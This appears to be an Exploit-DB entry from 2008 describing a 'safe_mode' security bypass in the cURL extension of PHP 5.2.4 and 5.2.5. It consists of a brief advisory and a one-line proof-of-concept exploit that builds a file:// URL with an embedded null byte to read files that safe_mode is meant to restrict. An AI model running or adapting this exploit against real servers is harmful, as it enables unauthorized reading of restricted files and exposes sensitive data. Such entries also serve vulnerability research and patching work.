Lucene search

K
exploitdbMaksymilian ArciemowiczEDB-ID:31053
HistoryJan 23, 2008 - 12:00 a.m.

PHP 5.2.5 - cURL 'safe_mode' Security Bypass

2008-01-2300:00:00
Maksymilian Arciemowicz
www.exploit-db.com
26

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/27413/info

PHP cURL is prone to a 'safe mode' security-bypass vulnerability.

Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.

The issue affects PHP 5.2.5 and 5.2.4. 

var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));